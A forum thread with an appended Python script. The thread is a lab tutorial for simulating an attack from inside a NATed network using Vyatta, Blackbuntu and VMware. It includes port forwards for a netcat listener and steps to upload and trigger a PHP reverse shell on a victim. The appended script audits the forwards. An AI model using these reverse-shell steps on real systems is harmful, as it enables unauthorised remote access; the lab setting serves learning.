[ASK] Metasploit across different networks - Printable Version
Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum), Forum: Backtrack 5 Tanya Jawab, Thread: /thread-1511.html
[ASK] Metasploit across different networks - Junior Riau - 01-06-2012

I want to ask, bro: I was just browsing around at a neighbor, a fellow pentest OS, and found this: "use Vyatta in vmware to simulate Hacking from inside network scenario". Here is the screenshot. FYI, the neighbor uses Blackbuntu, bro. OK, let's get straight to it.

Image:
R1 - Vyatta has 2 NICs: eth0 simulates the WAN, eth1 is the LAN
Victim - Linux (you can use another operating system to create the vuln image)
Attacker - Blackbuntu Linux

Vmware Configuration:
1. Create a Vmware Team and add a Lan segment in the team for the Attacker-Network. Please read http://www.vmware.com/support/ws5/doc/ws_team_create_wizard.html for more information on how to create a team in vmware
2. Add the Vyatta image to the team, set eth0 to connect to NAT, eth1 to connect to the Lan segment in the team
3. Add Blackbuntu to the team, set the network interface (in my case eth0) to connect to eth1
4. Vuln Image (Victim): set the network to connect to NAT

Vyatta Configuration:
Set hostname and ip address, etc.

set system host-name R2
set system domain-name blackbuntu.lan
set interfaces ethernet eth0 address 172.16.14.11/24
set system name-server 172.16.14.2
set system gateway-address 172.16.14.2
set interfaces ethernet eth1 address 192.168.1.1/24
set service ssh

Configuring DHCP Server:

set service dhcp-server shared-network-name ETH1_POOL subnet 192.168.1.0/24 start 192.168.1.20 stop 192.168.1.200
set service dhcp-server shared-network-name ETH1_POOL subnet 192.168.1.0/24 default-router 192.168.1.1
set service dhcp-server shared-network-name ETH1_POOL subnet 192.168.1.0/24 dns-server 172.16.14.2

## Configuring NAT

set service nat rule 1 source address 192.168.1.0/24
set service nat rule 1 outbound-interface eth0
set service nat rule 1 type masquerade

## Configuring Firewall:
## Define a firewall rule set:

set firewall name ALLOW_ESTABLISHED
set firewall name ALLOW_ESTABLISHED rule 10
set firewall name ALLOW_ESTABLISHED rule 10 action accept
set firewall name ALLOW_ESTABLISHED rule 10 state

## Apply the rule set to an interface:

set interfaces ethernet eth0 firewall in name ALLOW_ESTABLISHED
set interfaces ethernet eth0 firewall local name ALLOW_ESTABLISHED
commit
save

After commit and save, at this point you should be able to ping and connect from Blackbuntu (Attacker) to Victim (and the internet too).

### Config port forward ###

Scenario/Question: When we hack into the victim, if we want a reverse shell back to the Blackbuntu box that is located on the inside network behind NAT, what can we do?

Solution/Answer: Configure DNAT rules with a destination port, and firewall destination rules.

Example: on the Blackbuntu box we are listening on port 80 for an incoming connection with the command

$ nc -lvvp 80

On vyatta, DNAT should be configured like this:

NAT RULES:

set service nat rule 10 type destination
set service nat rule 10 protocol tcp
set service nat rule 10 inside-address port 80
set service nat rule 10 inside-address address 192.168.1.52
set service nat rule 10 inbound-interface eth0
set service nat rule 10 destination port 80
commit

FIREWALL RULES:

set firewall name ALLOW_ESTABLISHED rule 20 action accept
set firewall name ALLOW_ESTABLISHED rule 20 protocol tcp
set firewall name ALLOW_ESTABLISHED rule 20 destination address 192.168.1.52
set firewall name ALLOW_ESTABLISHED rule 20 destination port 80
set firewall name ALLOW_ESTABLISHED rule 20 state new enable
set firewall name ALLOW_ESTABLISHED rule 20 state established enable
set firewall name ALLOW_ESTABLISHED rule 20 state related enable
set interfaces ethernet eth0 firewall in name ALLOW_ESTABLISHED
commit
save

Forward port 4321

NAT RULES:

set service nat rule 20 type destination
set service nat rule 20 protocol tcp
set service nat rule 20 inside-address port 4321
set service nat rule 20 inside-address address 192.168.1.52
set service nat rule 20 inbound-interface eth0
set service nat rule 20 destination port 4321
commit

FIREWALL RULES:

set firewall name ALLOW_ESTABLISHED rule 30 action accept
set firewall name ALLOW_ESTABLISHED rule 30 protocol tcp
set firewall name ALLOW_ESTABLISHED rule 30 destination address 192.168.1.52
set firewall name ALLOW_ESTABLISHED rule 30 destination port 4321
set firewall name ALLOW_ESTABLISHED rule 30 state new enable
set firewall name ALLOW_ESTABLISHED rule 30 state established enable
set firewall name ALLOW_ESTABLISHED rule 30 state related enable
set interfaces ethernet eth0 firewall in name ALLOW_ESTABLISHED
commit
save

Example: I edit php-reverse-shell.php and change the lines:

$ip = '172.16.14.11'; // CHANGE THIS
$port = 4321; // CHANGE THIS

upload it to the victim, then on the Blackbuntu box I browse to http://172.16.14.129/php-reverse-shell.php and run netcat with the command

nc -lvvp 4321

PHP Code:

If we use msfpayload to create the evil file, we use the command:

Well, that's supposedly how it goes when using Metasploit. I'm still experimenting with it, bro. To all the brothers and sisters, basically anyone on this forum who intends to try it, please post your results back here so it can be a learning experience too.

Forgot the source: http://www.blackbuntu.com/node/41
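The tutorial pairs every destination-NAT rule with a firewall rule that admits new connections to the same inside address and port. The sketch below is an added example, not part of the original post or the Blackbuntu tutorial: it lists each port forward in a set of Vyatta `set` commands and reports whether such a firewall rule exists. The function names and the sample are constructed here, and it assumes the rule set is applied to the inbound interface as in the post.

```python
import re
from collections import defaultdict

# Constructed sample: the post's two DNAT rules, but only the port-80 firewall rule.
SAMPLE = """\
set service nat rule 10 type destination
set service nat rule 10 inside-address port 80
set service nat rule 10 inside-address address 192.168.1.52
set service nat rule 10 inbound-interface eth0
set service nat rule 10 destination port 80
set service nat rule 20 type destination
set service nat rule 20 inside-address port 4321
set service nat rule 20 inside-address address 192.168.1.52
set service nat rule 20 inbound-interface eth0
set service nat rule 20 destination port 4321
set firewall name ALLOW_ESTABLISHED rule 20 action accept
set firewall name ALLOW_ESTABLISHED rule 20 destination address 192.168.1.52
set firewall name ALLOW_ESTABLISHED rule 20 destination port 80
set firewall name ALLOW_ESTABLISHED rule 20 state new enable
"""

RULE = re.compile(r"set (service nat|firewall name \S+) rule (\d+) (.+)")

def parse(text):
    """Collect 'set ... rule N <key...> <value>' lines into {(table, N): {key: value}}."""
    rules = defaultdict(dict)
    for line in text.splitlines():
        m = RULE.fullmatch(line.strip())
        if m:
            key, _, value = m.group(3).rpartition(" ")
            rules[(m.group(1), int(m.group(2)))][key] = value
    return rules

def audit_forwards(text):
    """Return (rule, interface, outside port, inside target, admitted) per DNAT rule."""
    rules = parse(text)
    firewall = [r for (table, _), r in rules.items() if table != "service nat"]
    findings = []
    for (table, num), r in sorted(rules.items()):
        if table != "service nat" or r.get("type") != "destination":
            continue  # masquerade/source rules expose nothing inbound
        target = (r.get("inside-address address"), r.get("inside-address port"))
        admitted = any(
            f.get("action") == "accept" and f.get("state new") == "enable"
            and (f.get("destination address"), f.get("destination port")) == target
            for f in firewall)
        findings.append((num, r.get("inbound-interface"), r.get("destination port"),
                         target, admitted))
    return findings
```

Run over an exported configuration, the `admitted` column shows which forwards actually accept new inbound connections and which DNAT rules are left over without a matching firewall rule.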